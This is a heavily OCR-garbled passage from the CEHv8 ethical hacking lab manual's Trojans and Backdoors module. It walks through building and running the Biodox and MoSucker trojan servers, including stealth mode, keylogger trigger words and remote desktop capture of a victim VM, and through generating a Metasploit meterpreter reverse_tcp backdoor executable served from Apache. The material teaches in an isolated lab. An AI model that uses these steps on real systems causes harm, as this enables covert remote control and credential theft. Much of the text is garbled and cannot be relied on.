S erver.exe tile will be created 111 its default directory: Z:\CEHv8 Module 06
Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.
‫׳‬ A pp licator Toots B io d o x

| | Home Share View M anage "S’ ©

5 0 - ♦g « Trcjans Types ► GUITrojons ► D-odox Trojcn ► Biodox v|C | | Scorch Biodox

-Z Favorites J 4 Language

E Desktop M P lj 9 ‫ ״‬t

4 D ow nloads BIOCOX Cb fcd!t10n.e<e

‘k\l Recent places j p U in w


Libraries gM S\A 1N SC K .0C X

0 D ocu m ents £ 1 e s .g f

J'' M usic p i / [ server.exe")

B Pictures f t 5ertingj.ini

0 Videos

FIGURE 9.5: Bodox services

9. Now switch to Windows Server 2008 Virtual Machine, and navigate to

Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI
Trojans\Biodox Trojan to mil die serv er.ex e tile.

C E H L ab M an u al P age 501 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

’ r0)or» "ypea - GUI Trojon* - 3‫׳‬odo<c Tro,0‫־‬n - Biodox ■

‫׳‬ ‫ ־־‬i t t J i F - &

Pile edit /1eA‫׳‬ ‫־‬ools ie p

Crg»m:e ~ » (__ Open a

Fa/orite Links
I *I tnodfi«d I *I Typ* Ms.. I•I
f D ocuncnts I i^Ptugns
%1 Pictu-es 4 I b 1X O ^ Or & 4to r .ete
R j Music p Leetre
<£ m 5c <*‫׳‬c t . . ocx
More »


i. ... .*jm-r.
^ 3iodo!c Trojan
J . Botox
JA Language
J4 Pogne

FIGURE 9.6: Bodox server.exe

10. Double-click server.exe 111 Windows Server 2008 virtual macliine, and click
Run 111 die Open File - Security Warning dialog box.

‫ ן‬Open File - Security Warning

The publisher could not be verified. Are you sure you want to
run this software?
Name: .. .pes\GUI Trojans'Biodox Tr0jatVf310d0x\server.exe
E Publisher: U n know n P ub lisher

Type: Application

From: Z:\CEHv8 Module 06T roja n s and Backdoors \Trojan...

Run Cancel

• This file does not have a valid digital signature that verifies its
tgV publisher. You should only run software from publishers you trust.
How can I decide what software to run*

FIGURE 9.7: Run the tool

11. Now switch to Windows 8 Virtual Macliine and click die active/d eactive
sta tu s button to see die connected machines.

C E H L ab M an u al P age 502 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

Biodox Open Source Edition

S e r v e r Editor

-F a k e Error Message —
r S commcnicaton
□ ‫■־‬------------
passw ords
m anage ftes
□Q S Msg TlUc ; |br-or
j keyboard M e ssa g e : [biodox w
f la m snsettjnos
A d re ss: 10.0.013 Message Icon :
settings ma-iage‫־׳‬
O system n f o ‫־‬matr>n
‫׳‬.‫־‬#.• fin m a n a o e r - Vctim flam e‫־‬
jj‫ ׳‬commands N am e: Ivic
C on n e ctio n : [6661 | S a e e n C a p tjre : |6663 |
[_jj capture
3 se rv e r properties T r a n s f e r :|6 6 s? | webcam C apture: |6664 |
r connection
c onnection D elay -
A local tools
“\) contact us
D^ayjiOI 1ee. ‫ זכי‬connectioi

O Windows O Temp 0 System 32

-R e g etry S ew ings-
•se rv e r M o d e -
K ey: m ssrs:
© Gizli Mod O Yardyrr Mocu

Connection P xt
S Connection 6561
T ransfer 6962
® Saeen 6563
® WebCam 6564

Vctom Name IP Adress User Narre Con>putcr... Admin Operatin... Cpu Ram Coentry

S t a t u s : S e t t i n g s s a v e d an d s e r v e r c r e a te d ( a c t iv e / d e a c t iv e s t a tu s

FIGURE 9.8: Bodox open source editior

12. After getting connected you can view connected victims as shown 111 die
following screenshot.
Biodox Open Source Edition

(D0I ----------
3 commcnicaton
2 ‫ ־'־‬passw ords
m anage fles
‫ם‬00 Msg T itle :

Message :

|biodox w a s here

msn settinos
A d re ss: 10.0.013 Message Icon ;
settings maTage‫־׳‬
O systerr n fty m a to n
----- © ‫צב‬ V
‫*׳‬fl'• f in m anager
C onnection: |6661 | S a e e n C a p tu r e : |6663 |
| j | capture
ijj se rv e r prop»rt 1 »c T r a n s f e r :[6662 | webcam C apture: |6€€4 |
r Connection Delay —
‫ ־־‬local tools
o«l»y | 1 0 | fer ‫־‬ - Install P a th ------------------------
^}) contact us
O Windowo O Temp

r Server M o d e -
K ey: m ssrs3 2
O Yordyro Modu
: mssrs32e:

S Connection 6561 I J/D
H Transfer 6562
‫ לי‬Saeen 6563
S WebCam 6564

altemfc . IP Adress______U ssi Marcs___ CaniButfir...__ Admin_____ Qpsratin...__ c p u

Adrrinistr... WIN -EGB.. Win Vista 3D93 0 .9 9 GB U nited.

S t a t u s : d i e n t A c t iv e

FIGURE 9.9: Bodox open source editior

13. Now you can perform actions with die victim by selecting die appropriate
action tab in die left pane of die Biodox window.
14. Now click the settin g s m anager opdon to view the applications running
and odier application settings.

C E H L ab M an u al P age 503 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

Biodox Open Source Edition

@ 01 Name PID Path Memory ... Priority a

rS commuiicaton S I (system pr... 0 System 0 0
A passw ords H*J c y tttm 4 System 0
m snags fles
j keyboard
2 3 s m s s .e x e
H 3 csrss.ex e
f la m snse ttm as 544
csrss.ex e System 7430144 Not rial
9 se ttings m aT agy
1 a p jlic a to n s ~ |
H•!! wmm1 t.e> e 552 System 4849664 Hiob B
L.-J ‫׳‬.vinlogon ex e 580 System 6287360 High
1A a p ^ ic a to n setbnos
£ ex3lore‫ ׳‬s e tin g s
1 1 ‫ )ן‬se rv c e s .e x e 628 System 7188480 Normal 0
I Q k a s s .e x e 640 System 10821632 Normal ‫ן‬-------- 1
C3 pm t
^ services 5 lls m .e x e 648 System 4812800 Normal
0 system information i y svch o st.e x e 836 System 6418432 Normal
‫׳‬. $• fun m anager 1 3 sv c fo st.e x e 896 System 7192576 Normal
jj1‫ ׳‬commands svch o st.e x e 992 System 9965568 Normal □
^ capture iij) svch o st.e x e 1015 System 7016448 Normal
j se rv e r prop ero e;
A !oral tools
svch o st.e x e
iiJ d s v c .e x e
W) con tact us svch o st.e x e 360 System 12091392 Normal v !‫וזו‬
Connection P xt
5 Connection 6561
T ransfer 6962
® Screen 6563
® WebCam 6564

? A dress User Narre C om puter... Admin O peratin... Cpu

Admmstr... WIN-EGB... True 0 .9 9 GB U nited...

Status : successfully Clear Application List

FIGURE 9.9: Boclox open source editor

15. You can also record die screenshots o f die victim by clicking die Screen
Capture button.

16. Click die Start S creen Capture button to capture screenshots o f die
victim’s machine.

FIGURE 9.10: screen capmre

17. Biodox displays the captured screenshot of the victim’s machine.

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Module 06 - Trojans and Backdoors

V 41 * * ** V Saeen Capture x


‫ט‬ 9

Nr* Te*t

FIGURE 9.11: screen capture

18. Similarly, you can access die details o f die victim’s machine by clicking die
respective functions.

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion on
your target’s security posmre and exposure dirough public and tree information.



T o o l/U tility In fo rm atio n C o llected /O b jectiv es A chieved

B iodox O u tp u t:
Record the screenshots o f the victim machine

In te rn e t C o n n ectio n R eq u ired
□ Yes 0 No
P latform S upported
0 C lassroom 0 !Labs

C E H L ab M an u al P age 505 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

AH Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

Creating a Server Using the

M oSucker is a V isual Basic Trojan. M0Snke/Js edit server program has a client
)rith the same layout as suhSeven's client.

I CON KEY Lab Scenario

[£Z7 Valuable A backdoor is a secret or unauthorized channel for accessing computer system.
inform ation______
111 an attack scenario, hackers install backdoors 011 a machine, once
.y v T est vour compromised, to access it 111 an easier manner at later times. W ith the growing
knowledge_______ use o f e-commerce, web applications have become the target o f choice for
** W eb exercise attackers. With a backdoor, an attacker can virtually have full and undetected
access to your application for a long time. It is critical to understand the ways
<‫־‬r • . W orkbook review
backdoors can be installed and to take required preventive steps.
You are a security administrator o f your company, and your job responsibilities
include protecting the network from Trojans and backdoors, Trojan attacks,
theft ot valuable data Jtrom the network, and identity theft.

Lab Objectives
The objective o f this lab is to help students learn to detect Trojan and backdoor
Tlie objectives o f the lab include:
I T Tools
dem onstrated in
■ Creating a server and testing the network for attack
th is lab are ■ Detecting Trojans and backdoors
available in
D:\CEH- ■ Attacking a network using sample Trojans and documenting all
Tools\CEHv 8 vulnerabilities and flaws detected
Module 06 Trojans
and Backdoors Lab Environment
To carry tins out, you need:
■ M oSucker tool located at D:\CEH-T00 ls\CEHv 8 M odule 06 Trojans and
B ackdoors\T rojans Types\GUI T rojans\M oSucker

‫י‬ A computer running Windows Server 2012 as host machine

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

■ A computer running Window Server 8 Virtual Machine (Attacker)

■ W indows Server 2 008 running 111 Virtual Machine (Victim)

■ A web browser with Internet access

■ Administrative privileges to mil tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program diat contains m a licio u s or harmful code inside apparendy
harmless programming or data 111 such a way that it can g e t con trol and cause
damage, such as ruining die file allocation table on a hard drive.
Note: The versions of die created client or host and appearance o f die website may
differ from what it is in die lab, but die actual process of creating die server and die
client is same as shown 111 diis lab.

Lab Tasks
3 t a s k 11. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06
_ Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker.
Create Server
with ProRat2. Double-click die C reateServer.exe file to create a server.
F - p i ‫־‬ ‫׳‬ A pp licator Tools M oSucker

| Home Sh View M anage ‫ש‬ ©

Trcjans T ypes ► GUI Trojans ► MoSuckcr V | <‫ | | צ‬Scorch M oSuckcr fi |

* _ “

-<‫ ׳‬Favorites J ! AY Firewall e /e n ts

■ Desktop J tcg i

f t D ow nloads Jl. pi j g ns

'2Al Recent place} j . runtim K

screen shots

04 Libraries J i slons

Q D ocu m ents j . stub

^ Music | ^C fea? eServer.exe |

M Pictures M jSjcL cr exe

Q j Vid»oc j_] R eadM e.txt

lO iterrc 1 it*m cel»rt#d 456 K2

FIGURE 10.1: Install createServer.exe

3. 111 the Open File - Security Warning dialog box, click Run.

C E H L ab M an u al P age 507 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

Open File ‫ ־‬Security Warning

Th e p u b lish e r c o u ld n o t b e v e rifie d . A r e you s u re you w a n t to run this

so ftw a re ?

Nam e: ...Trojans Types\GUI Trojans\M oSucker\CreateServer.exe

S3 P u b lish e r U n k n o w n P u b lish e r

Type: A p p lic a tio n

From: Z:\C EH v8 M o d u le 06 Trojans and BackdoorsVTrojans T...

Run Cancel

This file does not have a v alid d igital signature tha t verifies its
publisher. Y o u should o n ly run software fro m publishers y o u trust.
H o w can I d ecide w hat software to run?

FIGURE 10.2: Install createServer.exe

£ / Tools 4. The MoSncker Server Creator/Editor window appears, leave die default
dem onstrated in settings and click OK.
th is lab are
available in MoSucker 3.0
D:\CEH- S erver C reato r/E d itor
Coded by Superchachi. Contains code from Mosucker 2.2 by Krusty
Tools\CEHv 8 Compiled for Public release B on November 20/2002, VB6
Module 06 Trojans
(• I want to create a stealth trojan server for a victim
and B ackdoors
I- Indude Msvbvm60.dll in your MoSucker server (adds 750 KB) CD
17 Indude mswinsock.ocx in your server (adds 50 KB) Recommended! CD
17 Pack for minimal file size CD
MoSudcer Transport Cipher Key
V Add | 2385 KB to the server. ‫ש‬
( I want to create a visible server for local testing.
I want to edit an existing server

17 Start configuration after creating the server

About Cancel Ok

FIGURE 10.3: Install createServer.exe

5. Use die file name server.exe and to save it 111 die same directory, click

C E H L ab M an u al P age 508 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

& MoSucker Server C re a to r.

© 0 ^ [ « GUI T rojans ► M oSucker Search M oSucker

O rgan ize w N e w fold e r

0 D o c u m e n ts * N am e D ate m o d ifie d T yp e
J 1 M u sic
i . AV Firewall e v e n ts 9 /1 9 /2 0 1 2 1:37 PM File f o ld e i
P ictu res

8 V id e os
Xcgi 9 /1 9 /2 0 1 2 1 : 3 7 PM File f o ld e i

J p lu g in s 9 /1 9 /2 0 1 2 1:37 PM File f o ld e i

X r u n tim e s 9 /1 9 /2 0 1 2 1 : 3 7 PM File f o ld e i
H om egroup
J . s c r e e n sh o ts 1 0 /1 /2 0 1 2 6:56 PM File f o ld e i

X - sk in s 9 /1 9 /2 0 1 2 1:37 PM File f o ld e i
: ■ C o m p u te r
J stu b 1 0 /1 /2 0 1 2 6:50 PM File f o ld e i
^ L ocal D isk ( C )
J p C reateServer.exe 1 1 /2 8 /2 0 0 2 2:59 AM A p p licatia
V C E H -T ools ( \\1 0 .
j g | M 0 Su ck er.exe 1 1 /2 2 /2 0 0 2 5:10 PM A pp licatifl

^ N etw ork

File Q am eJ 5

Save as t y p e E xecu tab le F iles (*.exe)

“■ H id e Folders Save C an c el

FIGURE 10.4: Save Server.exe

6. MoSucker will generate a server with the complete settings in die default

MoSucker 3.0

G e n e r a t i n g s e r v e r ...
100% complete

Build Date: 11/28/2002 2:04:12 AM

Build Info: MoSucker 3.0 Public Release B

L e v e l A c c e s s e d : Public UPX
Verifying necessary filepaths
Preparing first stub
Preparing second stub
Packing first stub
Packing second stub
Modifying file headers

FIGURE 10.5: Install server progress

7. Click OK 111 die Edit Server pop-up message.

Edit Server 3.0

S e rv e r c re a te d s u c c e s s fu lly !
S e rv e r size: 1 5 8 KB.
D o n o t re p a c k s e rv e r.


FIGURE 10.6: Server created successful

111 the MoSucker wizard, change die VictinVs Nam e to Victim or leave all
the settings as dieir defaults.

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

MoSucker 3.0

Selected Server: |2:VCEHv8 Modde 06 Trojans and Backdoors\Trojans Type [ Close

Server ID: 1501704QWEYJC: 4264200TPGNDEVC 0
Cypher Key: TWQPCUL25873IVFCSJQK13761 ‫ש‬
[ Notification 1 Victim's Name: |vict!m ~] ‫ש‬
f Notification 2

Server Name(s): kernel32,mscOnfig,winexec32,netconfig‫״‬
Extension(s): exe,pif,bat,dliope,com,bpq,xtr,txp,

Conrectior-Bort: 142381 ‫ש‬

J<gyjg99g- I * Prevent same server multi-infections (recommended)
You may select a windows icon to associate
Fake Error
with your custom file extension/s.
File Properties

Read Save

FIGURE 10.7: Give die victim machine details

9. Now click K eylogger 111 die left pane, and check die Enable off-line
keylogger opdon, and dien click Save.

10. Leave die rest of die settings as dieir defaults.

MoSucker 3.0

Selected Server: |z:\CEHv8Module 06 Trojans and Backdoors \Trojans Type [ C~\ Close

P I !Enable off-line keyioggetj [T]
Log Filename:
monitor.kig ‫ש‬
1‫ ־‬Enable Smart Logging
Captwn key words to trigger keylogger (separate each with a comma) ‫ש‬
ho tmad,yahoo',login‫׳‬password,bankfsecurefcheckoutfregister,

Plug-ns ^<11
Fake Error
Fde Properties

Read Save

FIGURE 10.8: Enable the keylogger

11. Click OK 111 die EditServer pop-up message.

MoSucker EditServer 3.0

o Server saved successfully.

Final server size: 158 KB


FIGURE 10.9: Server save file

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

12. Now switch to Windows Server 2008 Virtual Machine, and navigate to
Z:\CEHv8 Module 06 Trojans and BackdoorsVTrojans Types\GUI
Trojans\MoSucker to run die server.exe hie.
3 2 ^ -Jpj*1
Si H I
Pit Edl Vtew ~odi •tep
* Virnt * ©
favorite Links ■»-» - H I- ‫■■־‬°■
i AVFrmsI e\en3

£ Pitres
1• Ml*

| 4. ^a‫־‬e
v 1•
—* ^viSvcce'.sxe

l__ ^ ^_______________________ I
FIGURE 10.10: click server.exe

13. Double-click server.exe in Windows Server 2008 virtual machine, and click
Run 111 die Open File - Security Warning dialog box.

Open File - Security Warning x 11

The publisher could not be verified. Are you sure you want to
run this software?
Name: .. .s\T 1r ojans Types\GUI TrojansV'loSucker'!server.exe
Publisher: U nknow n P ublisher

Type: Application

From: Z : \CEHv8 Module 06 Trojans and Backdoors\T 1r o ja n ...

Run Cancel

‫ן‬. This file does not have a valid digital signature that verifies its
f! publisher. You should only run software from publishers you trust.
How can I decide what software to run ‫ל‬

FIGURE 10.11: Click on Run

14. Now switch to Windows 8 Virtual Machine and navigate to Z:\CEHv8

Module 06 Trojans and BackdoorsVTrojans Types\GUI Trojans\MoSucker
to launch M oSucker.exe.
15. Double-cl1ckMoSucker.exe.

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

K W ‫־ ״‬ A pplicator took M oSucker

11 1 Ib m c Share View‫׳‬ M anage

]© )‫( * ־‬ t l i i * ‫ י ז ״ ז‬jnj Typca ► GUITrojanj ► MoSucker v C | Scorch MoSuckcr fi |

-{ F a v o rite AY F rewa 1 e /e n ts -J ! 5erver.exe

K Desktop M c9

6 D ow nloads J p ljg ns

ffil Rcccnt p l o t o 1 r u n tim e

£ scretnshocs

^gi Libraries ^ slons

H] D ocu m ents stub

M usic $ C rea:eServer.exe

[KJ Pictures ^M oSu derp e]

!HI Videos j | R ead M e.M

11 item s 1 item selerted 3.08 MB £ 5,

FIGURE 10.12: click on Mosuker.exe

16. 111 tlie Open File —Security Warning dialog box, click Run to launch
Open File - Security Warning

The publisher could not be verified. Are you sure you want to run this

Nam e:\Trojans Types\GUI Trojans\M oSucker\M oSucker.exe

S3 Publisher: Unknown Publisher

Type: A p p lic a tio n

From: Z:\C EH v8 M o d u le 06 Trojans and Backdoors\Trojans T...

Run Cancel

This file does not have a v alid d igital signature tha t verifies its
publisher. Y o u should o n ly run software fro m publishers y o u trust.
H o w can I d ecide w hat software to run?

FIGURE 10.13: Run the applicatin

17. Tlie MoSucker main window appears, as shown 111 die following figure.

10.0.012 ][10005

Misc stuff
File related
Spy related
Fun stuff I
Fun stuff II
Live capture

u iiu u i.m o s u c h c r . t K

* 0G

FIGURE 10.14: Mosucher main window

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

18. Enter the IP address o f die victim and port number as you noted at die time
of server configuration, and dien click Connect.
19. 111 diis lab, we have noted Windows Server 2008 virtual machine’s IP
address ( and port number: 4288.
Note: These might differ 111 your classroom labs.

FIGURE 10.15: connect to victim machine

20. Now die C onnect button automatically turns to D iscon n ect after getting
connected widi die victim machine as shown 111 the following screenshot.

version 3.0

FIGURE 10.16: connection established

21. Now click Misc stuff 111 die left pane, which shows different options from
which an attacker can use to perform actions from liis or her system.

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

'‫׳‬A b o u t _ |

I& Tools
dem onstrated in
th is lab are
available in
Tools\CEHv 8
Module 06 Trojans
and B ackdoors

FIGURE 10.17: setting server options

22. You can also access the victim’s machine remotely by clicking Live capture
in the left pane.
23. 111 the Live capture option click Start, which will open the remote desktop
of a victim’s machine.
‫ ׳‬A b o u t' _ ~x]

| 4288 11 Disconnect 11 Options ] s g JI& Q

Misc stuff m ake screen sh o t

File related
Make screenshot
Spy related JPEG Quality:
Fun stuff I * 20%
Fun stuff II • 30%
Live capture • 40%
Start • 50%
• 60%
• 70%
• 80%
O 90%

& oi£

FIGURE 10.18: start capturing

24. The remote desktop connection ot die victim’s machine is shown 111 die
following tigiire.

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

Rem ote adm inistration m ode

sssei sssa&i
RA m ode options

Resi2 e windo-v to 4:3

JPG Quality 1 '▼

Delay in ms | 1000

W Send mouseclicks
W Send pressed keys
Send mousemoves
W Autollpdate pics U
V Fullscreen

FIGURE 10.19: capturing victim machine

25. You can access tiles, modify die files, and so on in diis mode.
Rem10 te adm inistration m ode *

r\ *>
RA m ode o ptio ns

Resize window to 4 :3 1
*? ■
1 !


JPG Quality 190% ▼j

Delay in ms | 1000

W Send mouseclcks ______

^ :Tnt-.aocw
W Send pressed Leys
1“ Send mausemoves
W Autollpdate pics E1K«‫־‬ Cfc■‫־*־‬

J & Z Z -----------


► * *■‫־‬o‫י־יי‬
® 1• M
I,i‫״־‬h ‫־‬ — 1 o;

FIGURE 10.20: capturing victim machine

26. Similarly, you can access die details o f die victim’s machine by clicking die
respective functions.

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion on
your target’s security posUire and exposure through public and free information.

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Module 06 - Trojans and Backdoors


T o o l/U tility In fo rm atio n C o llected /O b jectiv es A chieved

M osu ck er O u tp u t:
Record the screenshots o f the victim’s machine

1. Evaluate and examine various methods to connect to victims if they are 111
different cities or countries.

□ Yes 0 No
P latform S upported
0 C lassroom 0 iLabs

C E H L ab M an u al P age 516 E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

Hack Windows 7 Using Metasploit

Metasp/oit Frame// ork is a toolfor developing and executing exploit code against a
remote target machine.

I CON KEY Lab Scenario

Z^7 Valuable [ Large companies are com mon targets for hackers and attackers o f various kinds
inform ation ______
and it is not uncom m on for these companies to be actively monitoring traffic to
.‫ * ׳י‬T est your and from their critical IT mfrastnicture. Based 011 the functionality o f the
knowledge _______ Trojan we can safely surmise that the intent o f the Trojan is to open a backdoor
e W eb exercise * 011 a compromised computer, allowing a remote attacker to monitor activity and
steal inform ation from the compromised computer. Once installed inside a
Q W orkbook review £ corporate network, the backdoor feamre o f the Trojan can also allow the
attacker to use the initially compromised computer as a springboard to launch
further forays into the rest o f the infrastructure, meaning that the wealth o f
liitormation that may be stolen could potentially be far greater than that existing
011 a single machine. A basic principle with all malicious programs is that they
need user support to do the damage to a computer. That is the reason why
Trojan horses try to deceive users by showing them some other form o f email.
Backdoor programs are used to gam unauthorized access to systems and
backdoor software is used by hackers to gain access to systems so that they can
send 111 the malicious software to that particular system. Successful attacks by
the hacker 01‫ ־‬attacker infecting the target environment with a customized
Trojan horse (backdoor) determines exploitable holes 111 the current security
You are a security administrator o f your company, and your job responsibilities
include protecting the network from Trojans and backdoors, Trojan attacks,
theft o f valuable data from the network, and identity theft.
& Tools
dem onstrated in Lab Objectives
th is lab are
available in The objective o f tins lab is to help students learn to detect Trojan and backdoor
D:\CEH- attacks.
Tools\CEHv 8
The objectives o f the lab include:
Module 06 Trojans
and Backdoors ■ Creating a server and testing the network for attack

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

■ Attacking a network using sample backdoor and monitor the system


Lab Environment
To cany diis out, you need:
■ A computer running Window Server 2012
‫י‬ BackTrack 5 r3 running in Virtual m achine

■ W indows7 running 111 virtual machine (Victim machine)

■ A web browser with Internet access

■ Administrative privileges to mil tools

Lab Duration
Tune: 20 Minutes

Overview of Trojans and Backdoors

A Trojan is a program that contains m a licio u s or harmful code inside apparendy
harmless programming or data 111 such a way that it can g e t control and cause
damage, such as mining die hie allocation table on a hard drive.

Lab Tasks
sd T A S K 1 1. Start B ackT rack 5 virUial machine.
Create Sever 2. O pen the terminal console by navigating to A pplication ^ B ackT rack
C onnection ‫ ^־־‬E xploitation T ools ‫ ^־־‬N etw ork E xploitation T o o ls ‫ ^־־‬M etasp loit
Fram ework ‫ ^־־‬m sfc o n so le
,y A pp lica tio ns P la c e s S y s te m | d LIUC O ct 2 3 1 0 : 0 3 ‫ ״‬AM

A c c e ss o r ie s ►

^ B ackltd ck : ‫ !*> ׳‬G athering

, f Graphic* V ulnerability A s s e s s m e n t ►

Internet ► ■0 E xp loitation Ib o ls ► . K N etw ork Exploitation Tbols ‫ ! > ־׳‬. C isc o A ttack s ►

i l l Office ►^ P n v ile g e E scalation ‫ ״‬/<§> Exp loitation Tools ► .1 . FasM Vack ►

^ Other ► B\ M aintaining A cc ess » ^ D a ta b a se Expl• ^ arm itage i H M eta sp lo it Fram ework ►

! ^ ‫ ״‬Sound & V ideo ► R ev e rse E n gin een n g » W ir ele ss Explo ^ m sfd i if - . SAP Exploitation »

Open your terminal f l f S y s te m Tools ► ^ RFID T ools ► ^ S ocial E n gm ee ^ m sfc o n s o le ^ isr-evilgrade

(CTRL + ALT + T) and type 5 W ine ► a S tr e ss Testina ‫־״‬ P h ysical E xplo ^ m sfu p d a te n e to ea r -teln e te n a b le

msfvenom -h to view the r f - F ore n sics ► O p en Sou rce E 3b . start m sfpro ter m in e te r

available options for diis tooL ^ R eporting Tools

jP S e r v ic e s

? M isce lla n eo u s
* m _ ‫—׳‬ ‫ י‬, ‫כ‬ ‫א‬

<< back track

[C reate S im p le Exp loit...

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Module 06 - Trojans and Backdoors

FIGURE 11.1: Selecting msfconsole from metasploit Framework

3. Type the following command 111 msfconsole: m sfp ayload
w in d o w s/m eterp reter/rev erse tcp LH O ST= X >
D esk to p /B a ck d o o r.ex e and press Enter

N ote: This IP address ( is BackTrack machines. These IP addresses

may vary in your lab environment.
BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection I I
File Action Media Clipboard View Help

« 3 ®S 0 II 1► fe 1
Applications Places system ‫ם‬ Cj !S3 T U e0C t23. 3:32 PM

I File Edit V iew Terminal Help

3K0a SuperHack I I Logon

» [ m e t a s p lo it v 4 .s .0 - d e v [ c o r c : 4 b a p t: 1 . 0 ] y
- 927 ] = ‫ ״‬e x p l o i t s • 499 a u x i l i a r y - 151 p o s t
- 2 5 1 ] = ‫ ־ ־‬p a y lo a d s • 28 e n c o d e r s - 8 nop s

; > j n s f p a y lo a d w i n d o w s /n e t e r p r e t e r /r e v e r s e t c p L H O S T -1O .0.0.6 X > D e sk to p /B a c k d o o r

FIGURE 11.2: CreatdngBackdoor.exe

4. Tins command will create a W indow s e x e c u ta b le file with name the

M etasploit B a ck d o o r.ex e and it will be saved on the BackTrack 5 desktop.
Framework, a tool ‫ד׳‬----------------------- BackTrack on W1N-D39MRSHL9E4 - Virtual M ach ine C onn ection
for developing and J File Action Media Clipboard V !** Help

executing exploit it 0 ® @g ■ !‫ ן‬it fe

^ Applications Places System U 1ue OCt 23. 11:53 AM
cod e against a
rem ote target A
B a ckd oor.exe

<< back I track

,Vi ja a j
FIGURE 11.3: Created Backdoor.exe file

5. N ow you need to share B a ck d o o r .e x e with your victim machine

(Windows 7), by following these steps:

C E H L ab M a n u al P age 519 E th ica l H a c k in g an d C ounterm easures Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

6. O pen a new B ackT rack 5 terminal (CTRL+ALT+T) and then nan this
command mkdir /var/w w w /sh are and press Enter to create a new
director}‫ ״‬share.

To create new directory

share following command is
usedmkdir / var/www/ share

FIGURE 11.4: sharing the file

7. Change the mode for the share folder to 755, by entering the command
chm od -R 7 5 5 /var/w w w /share/ and then press Enter
BackTrack on W1N-D39MRSHL9E4 - Virtual M ach ine C onn ection
File Action Media Clipboard View Help

<910 (■
) @ O II It fe ,
A pp lications P la c es S y s te m □ d FT ■Rie Oct 2 3 . 12:03 Pf/

•*> ‫׳י‬ ‫ א‬ro o t^ b t: —
File Edit V iew Terminal Help
1-. ra<d1f A /»>*</share
^ o o t$>i ‫ ־‬- k c h a o d •R 7S5 / v a r / * w w / s h a r e / |

m To change die mode of

share folder use the following
comma11d:chmod -R *
/var/www/ share/

<< back I track £

FIGURE 11.5: sharing the file into 755

8. Change the ownership o f that folder into www-data, by entering the

command ch ow n -R w w w -d ata:w w w -d ata /var/w w w /share/ and then
press Enter.

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

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Fil• Action M idi• Clipboard Mw Hilp

It > ® @0 II It >»
Applications Places system ( * ] d I RJCoct 23.12:0‫ צ‬PM

' v k ro o t^ b t: ‫־־‬
ile Edit V iew Terminal Help
‫׳‬otgfet:‫ *־‬nkdir /var/www/share
-2 i . l l L . ‫ ■־‬T T ; i
■ .
■ o t'jb t:-♦ cnown •R ^ > d a ra :v.w data /y a r/w //s ftr> rc / \

To ch a n g e
ow nership of
folder into w w w ,
u se this com m and
chow n -R w w w -
< < back I track 5

FIGURE 11.6: Change the ownership of the folder

9. Type the command Is -la /var/w w w / | grep sh a re and then press Enter
BackTrack on W1N-D39MR5HL9E4 - Virtual M ach ine C onn ection '-!°‫*־׳‬
File Action Media Clipboard View Help
U 3 ® S> 0 II I t ffe
Applications Places system (>‫ך‬ d [>-<: 1ueOCt23.1

‫׳‬s v x r o o t^ b t -
Tile Edit V iew Terminal Help
ro o t^ b t:-* n k d ir / v a r / w w / s h a r e
ro o tg b t:-# chaod -R 755 /v a r / w v w /s h a r e /
'c -~ chow r -R w » d a t a : w u w d a t a / y a r / w w / s t m r e /
r o c t^ b t:-» I s - I d /v a r A * * t / | g r e p s h a r e |

<< back I track 5

-0 3
FIGURE 11.7: sharing die Backdoor.exe file

10. The next step is to start the A p ach e ser v er by typing the se r v ic e
a p a c h e 2 start command 111 the terminal, and then press Enter.

C E H L ab M an u al P age 521 E th ica l H a c k in g an d C o u n tem ieasu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

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Fil• Action M idi• CI1pbo»rd V !** Htfp

It > ® @0 II 1►>»
Applications Places system (‫] י‬ a I 1UC CCt 23. 12:07 PM

‫י׳‬ ‫׳י‬ ‫ א‬r a o t^ b t: —

File Edit V iew TSfrminal Help
ro o tja b t:‫ ־‬# n k d ir /var/www/share
ro o tja b t:-* ch«od -R 755 /v a r/w w /s h a re /
r o o tg b t:'♦ chowr ■R v m data:www data /var/wwv/shar<
ro o tg b t:-♦ I s - la /v a r /w w / | grep share
